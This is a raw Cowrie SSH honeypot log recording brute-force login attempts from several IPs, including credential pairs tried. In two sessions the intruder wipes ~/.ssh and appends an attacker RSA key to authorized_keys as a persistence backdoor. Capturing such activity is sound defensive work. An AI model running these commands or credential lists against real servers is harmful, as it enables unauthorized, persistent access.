{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:56:38.696301Z","src_ip":"152.32.190.168","session":"d592b94ebfc4"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx@2025","message":"login attempt [nginx/nginx@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T03:56:39.767215Z","src_ip":"152.32.190.168","session":"d592b94ebfc4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:56:41.026596Z","src_ip":"152.32.190.168","session":"d592b94ebfc4"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":46104,"dst_ip":"1.2.3.4","dst_port":22,"session":"80e72fc23130","protocol":"ssh","message":"New connection: 192.210.135.20:46104 (1.2.3.4:22) [session: 80e72fc23130]","sensor":"my-vps","timestamp":"2025-09-09T03:56:53.131548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:56:53.132456Z","src_ip":"192.210.135.20","session":"80e72fc23130"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:56:53.241689Z","src_ip":"192.210.135.20","session":"80e72fc23130"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"redhat","message":"login attempt [redhat/redhat] failed","sensor":"my-vps","timestamp":"2025-09-09T03:56:53.720005Z","src_ip":"192.210.135.20","session":"80e72fc23130"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:56:54.832089Z","src_ip":"192.210.135.20","session":"80e72fc23130"}
{"eventid":"cowrie.session.connect","src_ip":"162.254.38.159","src_port":38276,"dst_ip":"1.2.3.4","dst_port":22,"session":"d337e9c629aa","protocol":"ssh","message":"New connection: 162.254.38.159:38276 (1.2.3.4:22) [session: d337e9c629aa]","sensor":"my-vps","timestamp":"2025-09-09T03:57:03.686930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:03.687560Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:03.844939Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.login.success","username":"root","password":"poiuytrewq","message":"login attempt [root/poiuytrewq] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:57:04.517215Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:57:04.887680Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:57:04.888345Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:57:04.889521Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.048345Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:57:05.390260Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.391202Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.552062Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.552979Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.session.connect","src_ip":"162.254.38.159","src_port":58670,"dst_ip":"1.2.3.4","dst_port":22,"session":"944151e958de","protocol":"ssh","message":"New connection: 162.254.38.159:58670 (1.2.3.4:22) [session: 944151e958de]","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.720077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.720954Z","src_ip":"162.254.38.159","session":"944151e958de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:05.888643Z","src_ip":"162.254.38.159","session":"944151e958de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:57:06.600070Z","src_ip":"162.254.38.159","session":"944151e958de"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:07.770538Z","src_ip":"162.254.38.159","session":"944151e958de"}
{"eventid":"cowrie.session.connect","src_ip":"162.254.38.159","src_port":58678,"dst_ip":"1.2.3.4","dst_port":22,"session":"6979c94ed7c7","protocol":"ssh","message":"New connection: 162.254.38.159:58678 (1.2.3.4:22) [session: 6979c94ed7c7]","sensor":"my-vps","timestamp":"2025-09-09T03:57:07.926928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:07.927739Z","src_ip":"162.254.38.159","session":"6979c94ed7c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:08.085649Z","src_ip":"162.254.38.159","session":"6979c94ed7c7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:57:08.756973Z","src_ip":"162.254.38.159","session":"6979c94ed7c7"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:08.915606Z","src_ip":"162.254.38.159","session":"d337e9c629aa"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:08.916773Z","src_ip":"162.254.38.159","session":"6979c94ed7c7"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":47751,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ee62f22f6f","protocol":"ssh","message":"New connection: 211.22.25.164:47751 (1.2.3.4:22) [session: a2ee62f22f6f]","sensor":"my-vps","timestamp":"2025-09-09T03:57:09.938056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:09.938802Z","src_ip":"211.22.25.164","session":"a2ee62f22f6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:10.178941Z","src_ip":"211.22.25.164","session":"a2ee62f22f6f"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"0","message":"login attempt [lenovo/0] failed","sensor":"my-vps","timestamp":"2025-09-09T03:57:11.182001Z","src_ip":"211.22.25.164","session":"a2ee62f22f6f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:12.425157Z","src_ip":"211.22.25.164","session":"a2ee62f22f6f"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":45819,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4dc6acfcc20","protocol":"ssh","message":"New connection: 154.209.4.55:45819 (1.2.3.4:22) [session: c4dc6acfcc20]","sensor":"my-vps","timestamp":"2025-09-09T03:57:13.534242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:13.543411Z","src_ip":"154.209.4.55","session":"c4dc6acfcc20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:13.744570Z","src_ip":"154.209.4.55","session":"c4dc6acfcc20"}
{"eventid":"cowrie.login.failed","username":"private","password":"0","message":"login attempt [private/0] failed","sensor":"my-vps","timestamp":"2025-09-09T03:57:14.559041Z","src_ip":"154.209.4.55","session":"c4dc6acfcc20"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:15.763971Z","src_ip":"154.209.4.55","session":"c4dc6acfcc20"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":42732,"dst_ip":"1.2.3.4","dst_port":22,"session":"c69baf8721d1","protocol":"ssh","message":"New connection: 152.32.190.168:42732 (1.2.3.4:22) [session: c69baf8721d1]","sensor":"my-vps","timestamp":"2025-09-09T03:57:43.452722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:57:43.453789Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:57:43.713565Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.login.success","username":"root","password":"andrew123","message":"login attempt [root/andrew123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:57:44.794781Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:57:45.373202Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:57:45.374105Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:57:45.375275Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:57:45.636641Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:57:46.213622Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:57:46.214422Z","src_ip":"152.32.190.168","session":"c69baf8721d1"}
